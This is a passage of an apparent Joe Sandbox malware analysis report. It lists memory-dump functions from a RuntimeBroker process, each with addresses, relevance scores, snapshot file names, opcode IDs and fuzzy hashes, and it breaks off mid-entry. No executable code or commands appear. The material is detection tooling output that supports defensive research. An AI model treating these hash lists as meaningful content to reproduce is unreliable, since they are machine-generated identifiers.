                                                      • Instruction ID: f44f54f9267c861cb64b3f4367aca30c7d03f8975fb65f23beb02aaeec64e80c
                                                      • Opcode Fuzzy Hash: 5f31bb4765589e3bbf43aa4dab1083cb116eca122b6a36b9e55ecebfa93abe14
                                                      • Instruction Fuzzy Hash: 1B212551A4DD163EF65CB27C644A2FC22C1FF483A5F5840BAE40DC31E3CE2CA8808699
                                                      Function 00007FF848E82A19 Relevance: .1, Instructions: 86COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2384244803.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_7ff848e80000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 035c5ad3b146be40c5fbf1f7ea6f0c1f034e7770c03c8b43d4b1691ea0a8c3ca
                                                      • Instruction ID: e2916f8f3927bac2856ae2f3f79d098971771a8ef401f154be0260b14a816d97
                                                      • Opcode Fuzzy Hash: 035c5ad3b146be40c5fbf1f7ea6f0c1f034e7770c03c8b43d4b1691ea0a8c3ca
                                                      • Instruction Fuzzy Hash: 03214C21E0C90A8FEBA4FB6884587BC22D2FF94391F9546B5D40DD32A2DF38AC418758
                                                      Function 00007FF848E80C25 Relevance: .1, Instructions: 79COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2384244803.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_7ff848e80000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1659974de2cad02abd8f67ffaf2ab903ee4f0b67a5861d49d52ed02b7068ecaa
                                                      • Instruction ID: 4cfe3393c61a4035d3f6a5b33a4d1ca3dc0813feaee774b6b32ad3db636ba49e
                                                      • Opcode Fuzzy Hash: 1659974de2cad02abd8f67ffaf2ab903ee4f0b67a5861d49d52ed02b7068ecaa
                                                      • Instruction Fuzzy Hash: AC21D331A0D6899FE711FF68C8456EC7FA0FF42355F5441FAC0449B1D2DB3815498B65
                                                      Function 00007FF848E96D44 Relevance: .1, Instructions: 66COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2384244803.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_7ff848e90000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7be91c1f0ae83a7bd133f5a664b60ff76be4261f50f5324b4559f2b67a2b8251
                                                      • Instruction ID: abbd0e3e283a064e2ebac4cda9bf775290763dd3cefe0422f784367c7492297c
                                                      • Opcode Fuzzy Hash: 7be91c1f0ae83a7bd133f5a664b60ff76be4261f50f5324b4559f2b67a2b8251
                                                      • Instruction Fuzzy Hash: EB117C21E0C91A4FEBA8FB6884516B872D2FF98344F9005BAD40EC72D6DF78AC024784
                                                      Function 00007FF848E83D85 Relevance: .1, Instructions: 54COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2384244803.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_7ff848e80000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3abfb997775ace8859820dab6f75b04a43d8e4e4a76f74a8759e366332bf07e6
                                                      • Instruction ID: 1edb96f7dbcc9b9159c36a14104f9336bf5777b9926e4fdd93a27a8bf6ac7730
                                                      • Opcode Fuzzy Hash: 3abfb997775ace8859820dab6f75b04a43d8e4e4a76f74a8759e366332bf07e6
                                                      • Instruction Fuzzy Hash: 2711DA70908A198FDB94EB08C894FA973E1FB58311F5441BAD40DE7290CB78AEC4CF85
                                                      Function 00007FF848E80C38 Relevance: .1, Instructions: 53COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2384244803.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_7ff848e80000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9c8e71e527a25eb60cc7bead8d924e8a5263c10bd80aa7d004665807ae16341d
                                                      • Instruction ID: 3e2ee4ab451bbfa1aa9779ae36a969c299aecd2b97b891b4c87c5861ffc68329
                                                      • Opcode Fuzzy Hash: 9c8e71e527a25eb60cc7bead8d924e8a5263c10bd80aa7d004665807ae16341d
                                                      • Instruction Fuzzy Hash: 74118E31A0D68D9FE702FB28D8452EC7FB0FF42351F5546F6C084DB292DA3856498B95
                                                      Function 00007FF848EB7180 Relevance: .1, Instructions: 53COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2384244803.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_7ff848eb1000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3c6ddcd6c5a4e0267749aafe49e673e007e3ca6a37d52b8255175e7da3b0ae95
                                                      • Instruction ID: b71984adc48415056163cd267d1085e04ccf1c7d40b1c881cf8088fd84907d6f
                                                      • Opcode Fuzzy Hash: 3c6ddcd6c5a4e0267749aafe49e673e007e3ca6a37d52b8255175e7da3b0ae95
                                                      • Instruction Fuzzy Hash: B2014E56D8E5922ED70C76BCB8560F43B90EF0227AF0C90B7D08C8A153DE0954898799
                                                      Function 00007FF848EBD67A Relevance: .0, Instructions: 50COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2384244803.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_7ff848eb1000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bf9b9c9a4dd8c98dc6326b9c36faed3dbeabb1c7fc855daac0d2da1ed8acb534
                                                      • Instruction ID: 12e38dbeec8cc9b46ca6baef78c30b9479aa9c1120ccf4e381e3ebd12d842e2b
                                                      • Opcode Fuzzy Hash: bf9b9c9a4dd8c98dc6326b9c36faed3dbeabb1c7fc855daac0d2da1ed8acb534
                                                      • Instruction Fuzzy Hash: 7C01B132F088098FEB54EA58D4843F877A2FBA83A1F094171D00DE7195DB39E8828758
                                                      Function 00007FF848E80C40 Relevance: .0, Instructions: 47COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2384244803.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_7ff848e80000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7410dcb7c1c4af9ef551c4d3616ea0af4d1460fa92bfbc28acc681870fe0ae17
                                                      • Instruction ID: d85d40a25b7ff359e4467be9493c396adcc6bec3f2e1cfd15c1ab4406b8f88ac
                                                      • Opcode Fuzzy Hash: 7410dcb7c1c4af9ef551c4d3616ea0af4d1460fa92bfbc28acc681870fe0ae17
                                                      • Instruction Fuzzy Hash: 2D016931A0D6899FE702EB28C8542EDBFB0FF42350F5545E6C080DB292DA3856498B95
                                                      Function 00007FF848E93F68 Relevance: .0, Instructions: 47COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2384244803.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_7ff848e90000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1985ab09e63bb8f7461b1dc27944bbc5252c5a3a95665f7f3a1bf205112a0755
                                                      • Instruction ID: 81ad6f4719d80f0ec96415d770489cbdafe4d59f2780e34e1bc97942bc367e68
                                                      • Opcode Fuzzy Hash: 1985ab09e63bb8f7461b1dc27944bbc5252c5a3a95665f7f3a1bf205112a0755
                                                      • Instruction Fuzzy Hash: 66019E70D0C50B8FEB58EA9CC8596FEB7A4FF55795F00123AC016C32A0DFB825418B94
                                                      Function 00007FF848E944B1 Relevance: .0, Instructions: 44COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2384244803.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_7ff848e90000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d8ad1ab5b87a28b0b99a930abff9c9a434606e57e53eaf8a08e68b3546d12f49
                                                      • Instruction ID: a91b8619bec2bf361a0c115887e1dd36093ec5f47597101b0e4213bdb8518002
                                                      • Opcode Fuzzy Hash: d8ad1ab5b87a28b0b99a930abff9c9a434606e57e53eaf8a08e68b3546d12f49
                                                      • Instruction Fuzzy Hash: A7F0FC31D0C5864FE766B66484142BA37D1BF96358F0902BBC44EC71D3DE7C99468355
                                                      Function 00007FF848E9833C Relevance: .0, Instructions: 42COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2384244803.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_7ff848e90000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9049c04eef4c5d3517e522b49eee1755b9d49d444b1f175f9d799505de0aef98
                                                      • Instruction ID: f97b6c9f78e9937dc4dc4bfb7a51bb0bc9b5d772bd60ca65b1d19f4536c820ab
                                                      • Opcode Fuzzy Hash: 9049c04eef4c5d3517e522b49eee1755b9d49d444b1f175f9d799505de0aef98
                                                      • Instruction Fuzzy Hash: 70018B21E0C85A8FFA94FA548455AB83291FF55340F1442F6D80DD72D2CF38BD418B84
                                                      Function 00007FF848E80C48 Relevance: .0, Instructions: 41COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2384244803.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_7ff848e80000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e420d1e6fe104e70cd10390f7e7ed5ef79254df7c0fb2f071e1fb7f4f16bc15a
                                                      • Instruction ID: 4417abdbef1c0bcda944008d119b87f96253d1a83ae4d7787a3e7108bee77af6
                                                      • Opcode Fuzzy Hash: e420d1e6fe104e70cd10390f7e7ed5ef79254df7c0fb2f071e1fb7f4f16bc15a
                                                      • Instruction Fuzzy Hash: 46015A7190D7899FE702EB68C84429DBFB0FF42354F5541EAD040DB292DA385A49CB91
                                                      Function 00007FF848E84F0E Relevance: .0, Instructions: 40COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2384244803.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_7ff848e80000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b7a96941b2942c9f609616d1e927ab3aa078af5577ff1127fff00092cb03cb61
                                                      • Instruction ID: b419039573e398e1584ad1a57064f5baf146c906585715c5fc5bc00857358be4
                                                      • Opcode Fuzzy Hash: b7a96941b2942c9f609616d1e927ab3aa078af5577ff1127fff00092cb03cb61
                                                      • Instruction Fuzzy Hash: C0017C21E0D9668FEBA1FB64845467C3790FF55360FA401F6C44EA3292DF3969418745
                                                      Function 00007FF848E80C50 Relevance: .0, Instructions: 36COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2384244803.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_7ff848e80000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fa75ccdf2b3aab6d1bcac7b5f1374372c33f4688e5763f8caf0d010090a013f0
                                                      • Instruction ID: ae587d8c9fa2b10dad1bb3720a8f5794a80afbf83b356ebd189300f2151b1652
                                                      • Opcode Fuzzy Hash: fa75ccdf2b3aab6d1bcac7b5f1374372c33f4688e5763f8caf0d010090a013f0
                                                      • Instruction Fuzzy Hash: E8014B7090D7899FE712EB64848429DBFB0FF02354F5441E6D440DB292DA385A48C755
                                                      Function 00007FF848EBAD59 Relevance: .0, Instructions: 36COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2384244803.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_7ff848eb1000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0137d537454019dbb374080674dc547e53d2e0856efe371c479ffea018196c71
                                                      • Instruction ID: fcca27f9d320b925f20e9cc32536dff977c6df31ca41e3e05c7aa82794f097c9
                                                      • Opcode Fuzzy Hash: 0137d537454019dbb374080674dc547e53d2e0856efe371c479ffea018196c71
                                                      • Instruction Fuzzy Hash: BBF0EC31B0CBC44FC729953D58590717FE1DB6B50234902FFC086C76A3DD55AC868341
                                                      Function 00007FF848E82B3D Relevance: .0, Instructions: 35COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2384244803.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_7ff848e80000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 436df963ac4971543a82ffba23c3fc813e1d492e3c47f0be546b0eaff253ac19
                                                      • Instruction ID: 897828f0cad2904c0c3f1e321a18de19ee6196dcc1b12444fcd6fbfab5531f45
                                                      • Opcode Fuzzy Hash: 436df963ac4971543a82ffba23c3fc813e1d492e3c47f0be546b0eaff253ac19
                                                      • Instruction Fuzzy Hash: 72F0313094C85E8EEBB4FA14C8446EC73A2FF90391F9441F5C00DD31A2DF7869818B48
                                                      Function 00007FF848E93FBF Relevance: .0, Instructions: 35COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2384244803.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_7ff848e90000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7c955cdb5716df3008ea7679e09f33d9a4b0e742a7e3410cd68addcad032e7f3
                                                      • Instruction ID: 2869e4fc56d65e0350dfba67b5bb3bb8ae8e81d1d595a4a49d6646aea2ff30a7
                                                      • Opcode Fuzzy Hash: 7c955cdb5716df3008ea7679e09f33d9a4b0e742a7e3410cd68addcad032e7f3
                                                      • Instruction Fuzzy Hash: 59F04970E0891B8FEB98EA8CC9556FE77B0FF55355F00063AC016C3294DF7869418B84
                                                      Function 00007FF848E80B77 Relevance: .0, Instructions: 34COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2384244803.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_7ff848e80000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9e529a8971c0c08948b526ccec0418b06fdbf8e572ef88851ffba145a90c2298
                                                      • Instruction ID: 3d9fe52116f3cd3b994742c43faaa95fa8d6b8a69e088d83ccc2dfed2720d27b
                                                      • Opcode Fuzzy Hash: 9e529a8971c0c08948b526ccec0418b06fdbf8e572ef88851ffba145a90c2298
                                                      • Instruction Fuzzy Hash: 31F0E53525EA89DFD742AB3CC8A58D8BF60FF03204F5A02EAD089CB563C315585DCB41
                                                      Function 00007FF848EBB0DA Relevance: .0, Instructions: 34COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2384244803.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_7ff848eb1000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 05f88a0c3db9abe603f54202443f1ae54d261dbf3c76b81e5937a7b566e2f26b
                                                      • Instruction ID: 9e510deee0ca9292b2bf86d13b6198f576a228c2a5e4554b32584c664014f65a
                                                      • Opcode Fuzzy Hash: 05f88a0c3db9abe603f54202443f1ae54d261dbf3c76b81e5937a7b566e2f26b
                                                      • Instruction Fuzzy Hash: 6EF0E220E0D84A8FE284FB1840993B8B6D1FFA8741F5401B5C00CD3283DF3C68818305
                                                      Function 00007FF848E947C4 Relevance: .0, Instructions: 33COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2384244803.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_7ff848e90000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b1f6850ea463fbd98618da56179b592f4e9e7f7347a8285fffb6543d260b0736
                                                      • Instruction ID: 72dfe41cc1271e0580601fd6b3606b566de14bbf7e733d6eeb018244facd3da0
                                                      • Opcode Fuzzy Hash: b1f6850ea463fbd98618da56179b592f4e9e7f7347a8285fffb6543d260b0736
                                                      • Instruction Fuzzy Hash: 91F03A30D0C5064FEA58BA9894406B932D1FF45398F5145B5D85A83297DF78A8528688
                                                      Function 00007FF848E99302 Relevance: .0, Instructions: 30COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2384244803.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_7ff848e90000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a2c5ea5f636c987af263b5fdadf485b1e4b37b9572e46316133d7d0a7c0d2da8
                                                      • Instruction ID: 0f8b5b57bd63dcfd1c2f07b7a64f6f6c55e27444d5c6690cd51d635ba2b73a24
                                                      • Opcode Fuzzy Hash: a2c5ea5f636c987af263b5fdadf485b1e4b37b9572e46316133d7d0a7c0d2da8
                                                      • Instruction Fuzzy Hash: FDE03932A1C9098FEBA4FB68D4457EC73E1FF49350F5000B6D00EC7292CB34A8118B44
                                                      Function 00007FF848EB3459 Relevance: .0, Instructions: 30COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2384244803.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_7ff848eb1000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b32827403d9754e2d7f93f846f53b8dba17095e34509aea7cab0fb39bbe534b6
                                                      • Instruction ID: a739e06f0e8502fe483e838922758398eaa7352804999297bed0dab5d7847b66
                                                      • Opcode Fuzzy Hash: b32827403d9754e2d7f93f846f53b8dba17095e34509aea7cab0fb39bbe534b6
                                                      • Instruction Fuzzy Hash: D5E09220609BC84FC70EA63848685607FB1EB6711178902DBC045CB2A3D919DC89C751
                                                      Function 00007FF848EB21E9 Relevance: .0, Instructions: 28COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2384244803.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_7ff848eb1000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f3ad7cffc902df96429ebf736261827b8904ec7145188199f9eeb50cb6e1ef7f
                                                      • Instruction ID: ba72e72833af96ee131c3f19372bec77b25fe385a5b738d822424ac03b9dd320
                                                      • Opcode Fuzzy Hash: f3ad7cffc902df96429ebf736261827b8904ec7145188199f9eeb50cb6e1ef7f
                                                      • Instruction Fuzzy Hash: 79E0D830B197C44FC70DA63C8869524BBB1EF67102B8952FEC445CB1A3DA19DC85C741
                                                      Function 00007FF848EBD969 Relevance: .0, Instructions: 25COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2384244803.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_7ff848eb1000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b4628a7e4849d393784ee989d8ed4809375549ca9db471b5541fbb6bcb097d0c
                                                      • Instruction ID: f3d4e085bc6c5acc53db3d3df450aa129fcea85a893356c57538809b3b7e23c5
                                                      • Opcode Fuzzy Hash: b4628a7e4849d393784ee989d8ed4809375549ca9db471b5541fbb6bcb097d0c
                                                      • Instruction Fuzzy Hash: 02E04F7294F7C08FC70B9B7488B98503F60EF2721174A41EAC045CF1B3DA6A8849C711
                                                      Function 00007FF848EBD8E9 Relevance: .0, Instructions: 25COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2384244803.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_7ff848eb1000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cedcf65cbf565e8bc13eb93ae76e08cf0ceaebb5935e5a79fc15442905327a46
                                                      • Instruction ID: 85572a5e45cd1c369aa1d6bf560f13143b757b9d6cd218781dd89967dc619601
                                                      • Opcode Fuzzy Hash: cedcf65cbf565e8bc13eb93ae76e08cf0ceaebb5935e5a79fc15442905327a46
                                                      • Instruction Fuzzy Hash: 24E01A3294E7C08FC70B9B7488B98503F60EF2761174A41EAC085CF1B3D66A8849C712
                                                      Function 00007FF848EB7C44 Relevance: .0, Instructions: 25COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2384244803.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_7ff848eb1000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: dbd73fa94358818184ed736a35888d1213e25d001b95c5930502828affd512ce
                                                      • Instruction ID: 7ff830a7443cad6512879e5d8c0f948295f3bacf7d98cd8823ab38c64c157b8f
                                                      • Opcode Fuzzy Hash: dbd73fa94358818184ed736a35888d1213e25d001b95c5930502828affd512ce
                                                      • Instruction Fuzzy Hash: 08E01A34A8A7804FC70AAB3888A58943FB0EF57211B4A80EBD045CB1B3D62D9C4EC752
                                                      Function 00007FF848EB80D9 Relevance: .0, Instructions: 24COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2384244803.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_7ff848eb1000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 487fd515aaf4dc1a5f2f81f7933881eaa18897ea4ccfd2762966a6fd5dba7741
                                                      • Instruction ID: b752384c769f0f410027a9006e33708fca3bd32db75b6e4923dfe2a1ffce5200
                                                      • Opcode Fuzzy Hash: 487fd515aaf4dc1a5f2f81f7933881eaa18897ea4ccfd2762966a6fd5dba7741
                                                      • Instruction Fuzzy Hash: BBE04F3165AB804FC70AA728886D9547BF1EF6B211B4A40EBC045CB5B3D61DDC49C702
                                                      Function 00007FF848E95178 Relevance: .0, Instructions: 23COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2384244803.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_7ff848e90000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 47cbcdc54ea2d82ff77161c0754e1444da161be50743cd5490d6412486fd817f
                                                      • Instruction ID: 32e6ea605917876ef5762ba9247008bf6a6c45deb24af416aa9ffb141f28c6a4
                                                      • Opcode Fuzzy Hash: 47cbcdc54ea2d82ff77161c0754e1444da161be50743cd5490d6412486fd817f
                                                      • Instruction Fuzzy Hash: 5DD0A730B60A0D4B8B0CB63D8458430F3D5F7AA6167D452BDD40BC3281ED25ECC6CB84
                                                      Function 00007FF848EBA900 Relevance: .0, Instructions: 22COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2384244803.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_7ff848eb1000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                      • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                      • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                      • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                      Function 00007FF848EBA870 Relevance: .0, Instructions: 22COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2384244803.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_7ff848eb1000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                      • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                      • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                      • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                      Function 00007FF848E83824 Relevance: .0, Instructions: 21COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2384244803.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_7ff848e80000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
